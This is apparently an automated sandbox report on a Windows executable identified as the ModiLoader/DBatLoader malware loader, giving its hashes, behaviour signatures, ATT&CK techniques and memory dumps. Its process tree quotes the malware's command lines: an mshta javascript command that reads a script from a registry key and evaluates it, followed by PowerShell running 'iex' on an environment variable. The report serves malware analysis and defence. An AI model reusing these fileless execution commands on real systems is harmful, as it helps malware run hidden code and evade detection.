Analysis

  • max time kernel
    135s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2022 06:14

General

  • Target

    884de9273e952f5171abc09c84796dae.exe

  • Size

    478KB

  • MD5

    884de9273e952f5171abc09c84796dae

  • SHA1

    fb9f2f8575e67b41ce0e18f1cb8e8b86f066e2c8

  • SHA256

    e0233612d6f430952f891f3ca4d40ae4c825c428691a8bdff7b34f335beda674

  • SHA512

    4b49669af8ec58920c80dc5831ee4cd277adaf6305d8947f29f2b08d2e9cf74ffab87aa59fdc42c10f3a8ebfdf46a36f6ebe2f07cf52ff11aec145810bf72ca9

  • SSDEEP

    6144:MethZNvTbICmpn3SObr9VnlBRDRdt0Gh9L6Y4kxsl5QOc41zM4FpDJMxZs3:lhZN5unbnlRlhlhW5dDl

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\884de9273e952f5171abc09c84796dae.exe
    "C:\Users\Admin\AppData\Local\Temp\884de9273e952f5171abc09c84796dae.exe"
    1⤵
      PID:4772
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:GHVJ5l3="Vc3w0";w43E=new%20ActiveXObject("WScript.Shell");ZlWOjw4="A";H1H7xw=w43E.RegRead("HKCU\\software\\96UzmAX\\3XjtKrb4P1");qD97ep="Oui5m8s";eval(H1H7xw);Q5lI6bu="h6RefIg";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xumkkqnq
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3492

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3492-143-0x00000000055D0000-0x0000000005636000-memory.dmp
      Filesize

      408KB

    • memory/3492-141-0x0000000004DC0000-0x0000000004DE2000-memory.dmp
      Filesize

      136KB

    • memory/3492-145-0x00000000072D0000-0x000000000794A000-memory.dmp
      Filesize

      6.5MB

    • memory/3492-146-0x0000000006280000-0x000000000629A000-memory.dmp
      Filesize

      104KB

    • memory/3492-144-0x0000000005B60000-0x0000000005B7E000-memory.dmp
      Filesize

      120KB

    • memory/3492-138-0x0000000000000000-mapping.dmp
    • memory/3492-140-0x0000000004E50000-0x0000000005478000-memory.dmp
      Filesize

      6.2MB

    • memory/3492-139-0x0000000004720000-0x0000000004756000-memory.dmp
      Filesize

      216KB

    • memory/3492-142-0x00000000054F0000-0x0000000005556000-memory.dmp
      Filesize

      408KB

    • memory/4772-132-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/4772-133-0x0000000000400000-0x000000000047FF98-memory.dmp
      Filesize

      511KB

    • memory/4772-137-0x0000000000AB0000-0x0000000000B8C000-memory.dmp
      Filesize

      880KB

    • memory/4772-135-0x0000000000AB0000-0x0000000000B8C000-memory.dmp
      Filesize

      880KB

    • memory/4772-134-0x0000000000400000-0x000000000047FF98-memory.dmp
      Filesize

      511KB